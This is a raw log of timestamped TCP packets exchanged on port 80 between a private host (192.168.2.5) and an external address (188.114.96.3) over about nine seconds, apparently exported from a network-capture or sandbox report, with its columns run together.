                                                                Oct 11, 2024 01:36:45.770354986 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.775654078 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.865756035 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.866039991 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.870974064 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.871134043 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.898121119 CEST8049883188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.941452980 CEST4988380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.062681913 CEST4988380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.063488960 CEST4988880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.068036079 CEST8049883188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.068099976 CEST4988380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.068433046 CEST8049888188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.068535089 CEST4988880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.068685055 CEST4988880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.073499918 CEST8049888188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.167243958 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.222700119 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.270205021 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.275077105 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.364526033 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.364711046 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.369874954 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.369929075 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.425901890 CEST4988880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.431309938 CEST8049888188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.431322098 CEST8049888188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.431330919 CEST8049888188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.510646105 CEST8049888188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.550820112 CEST4988880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.621062994 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.675837994 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.723270893 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.728703022 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.962065935 CEST8049888188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.962182999 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.962457895 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:46.968318939 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:46.968355894 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.003942013 CEST4988880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.078737974 CEST4988880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.079442024 CEST4989680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.085048914 CEST8049888188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.085114956 CEST4988880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.085174084 CEST8049896188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.085231066 CEST4989680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.085319042 CEST4989680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.091077089 CEST8049896188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.263190985 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.316546917 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.379784107 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.385140896 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.441612959 CEST4989680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.447299004 CEST8049896188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.447335005 CEST8049896188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.447366953 CEST8049896188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.474565029 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.474824905 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.480031967 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.480474949 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.527617931 CEST8049896188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.582201004 CEST4989680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.770941973 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.776041985 CEST8049896188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.810600042 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.816418886 CEST4989680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.879484892 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.879576921 CEST4989680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.880484104 CEST4990280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.884733915 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.884951115 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.885124922 CEST8049896188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.885190010 CEST4989680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.885327101 CEST8049902188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.885425091 CEST4990280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.885536909 CEST4990280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.890381098 CEST8049902188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.892443895 CEST4990380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.898272038 CEST8049903188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:47.898642063 CEST4990380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.898642063 CEST4990380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:47.903834105 CEST8049903188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.238500118 CEST4990280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.244196892 CEST8049902188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.244235992 CEST8049902188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.253998995 CEST4990380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.259054899 CEST8049903188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.259073973 CEST8049903188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.259085894 CEST8049903188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.331693888 CEST8049902188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.343837976 CEST8049903188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.378916979 CEST4990280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.394658089 CEST4990380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.605298042 CEST8049903188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.605340958 CEST8049902188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.660392046 CEST4990380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.660981894 CEST4990280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.723887920 CEST4990380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.724841118 CEST4990380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.728852034 CEST8049903188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.730149031 CEST8049903188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.733166933 CEST4990380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.839589119 CEST4990980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.844914913 CEST8049909188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.847203970 CEST4990980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.847482920 CEST4990980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.852626085 CEST8049909188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.911218882 CEST4991080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.916029930 CEST8049910188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:48.916167974 CEST4991080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.916302919 CEST4991080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:48.921344042 CEST8049910188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.191605091 CEST4990980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.196777105 CEST8049909188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.196822882 CEST8049909188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.196835041 CEST8049909188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.269617081 CEST4991080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.275115967 CEST8049910188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.275156021 CEST8049910188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.320372105 CEST8049909188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.363284111 CEST4990980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.364214897 CEST8049910188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.410161018 CEST4991080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.587620020 CEST8049909188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.610862017 CEST8049910188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.628900051 CEST4990980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.660192013 CEST4991080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.722162962 CEST4990980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.722212076 CEST4991080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.722999096 CEST4991880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.723381996 CEST4991980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.727358103 CEST8049909188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.727432966 CEST4990980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.727688074 CEST8049910188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.727741957 CEST4991080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.727798939 CEST8049918188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.727961063 CEST4991880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.728075981 CEST4991880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.728146076 CEST8049919188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.728203058 CEST4991980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.728281021 CEST4991980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.733350992 CEST8049918188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.733365059 CEST8049919188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.798238039 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.803481102 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:49.803575039 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.804059029 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:49.808912992 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.083322048 CEST4991880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.083396912 CEST4991980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.088340998 CEST8049918188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.088360071 CEST8049918188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.088383913 CEST8049918188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.088397980 CEST8049919188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.088409901 CEST8049919188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.161370039 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.166219950 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.232649088 CEST8049919188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.242090940 CEST8049918188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.257961988 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.285131931 CEST4991880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.285151005 CEST4991980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.300761938 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.442333937 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.442960024 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.447885990 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.481590033 CEST8049919188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.483707905 CEST8049918188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.483897924 CEST4991880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.489480972 CEST8049918188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.489553928 CEST4991880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.535135031 CEST4991980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.537672997 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.537909031 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.542829990 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.543112040 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.543140888 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.598186016 CEST4991980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.598984003 CEST4992580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.603974104 CEST8049919188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.604038000 CEST4991980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.604064941 CEST8049925188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.604152918 CEST4992580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.604242086 CEST4992580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.609097958 CEST4990280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.609348059 CEST8049925188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.937510967 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.938324928 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.943200111 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.957241058 CEST4992580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:50.962241888 CEST8049925188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:50.962301970 CEST8049925188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.032967091 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.033221006 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.038220882 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.038252115 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.038280010 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.048635006 CEST8049925188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.097656965 CEST4992580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.284944057 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.330601931 CEST8049925188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.332012892 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.378875017 CEST4992580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.431910038 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.431940079 CEST4992580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.433024883 CEST4993180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.437848091 CEST8049931188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.439605951 CEST8049920188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.439634085 CEST8049925188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.439707041 CEST4992080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.439739943 CEST4993180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.439740896 CEST4992580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.439862967 CEST4993180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.442708015 CEST4993280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.444777966 CEST8049931188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.447957039 CEST8049932188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.449038982 CEST4993280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.465924025 CEST4993280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.470999002 CEST8049932188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.785511971 CEST4993180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.791234016 CEST8049931188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.791284084 CEST8049931188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.791312933 CEST8049931188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.816747904 CEST4993280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.822592020 CEST8049932188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.822633028 CEST8049932188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.893913984 CEST8049931188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.922998905 CEST8049932188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:51.941345930 CEST4993180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:51.972717047 CEST4993280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.134604931 CEST8049931188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.175071955 CEST8049932188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.175736904 CEST4993180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.222723961 CEST4993280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.248980045 CEST4993180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.249090910 CEST4993280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.249742031 CEST4993880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.254702091 CEST8049938188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.254908085 CEST8049931188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.254992962 CEST4993180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.255093098 CEST4993880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.255093098 CEST4993880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.255531073 CEST8049932188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.256017923 CEST4993280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.259958982 CEST8049938188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.286077976 CEST4993980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.291045904 CEST8049939188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.291121960 CEST4993980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.291209936 CEST4993980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.296072006 CEST8049939188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.613486052 CEST4993880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.644638062 CEST4993880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.644643068 CEST4993980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.645514011 CEST8049938188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.645549059 CEST8049938188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.645577908 CEST8049938188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.650197029 CEST8049938188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.650240898 CEST8049939188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.650269985 CEST8049939188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.699776888 CEST8049938188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.750027895 CEST8049939188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.753957987 CEST4993880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.800724030 CEST4993980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:52.992175102 CEST8049938188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:52.997571945 CEST8049939188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.035079002 CEST4993880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.041831970 CEST4993980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.109657049 CEST4993980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.110584021 CEST4994580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.114170074 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.115072966 CEST8049939188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.115154982 CEST4993980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.116094112 CEST8049945188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.117012024 CEST4994580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.117136002 CEST4994580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.119369030 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.120026112 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.120106936 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.122112036 CEST8049945188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.125463963 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.472795963 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.472795963 CEST4994580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.478388071 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.478425980 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.478478909 CEST8049945188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.478507996 CEST8049945188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.478534937 CEST8049945188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.565300941 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.570585966 CEST8049945188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.613210917 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.613210917 CEST4994580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.802253962 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.803899050 CEST4994580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.808367968 CEST8049945188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.808552980 CEST4994580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.809212923 CEST8049945188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.809274912 CEST4994580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.847585917 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.911685944 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.917020082 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.938401937 CEST4995280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.944631100 CEST8049952188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:53.944756031 CEST4995280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.945321083 CEST4995280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:53.950248957 CEST8049952188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.006052971 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.007250071 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.012671947 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.012712955 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.262815952 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.300968885 CEST4995280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.305883884 CEST8049952188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.305958033 CEST8049952188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.305972099 CEST8049952188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.316416025 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.379367113 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.384533882 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.390644073 CEST8049952188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.441442013 CEST4995280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.474064112 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.475393057 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.480412960 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.480494022 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.562474966 CEST8049952188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.613420010 CEST4995280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.686980963 CEST4995280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.687613010 CEST4995980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.692962885 CEST8049959188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.693047047 CEST4995980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.693126917 CEST4995980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.693278074 CEST8049952188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.693455935 CEST4995280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.698293924 CEST8049959188.114.96.3192.168.2.5
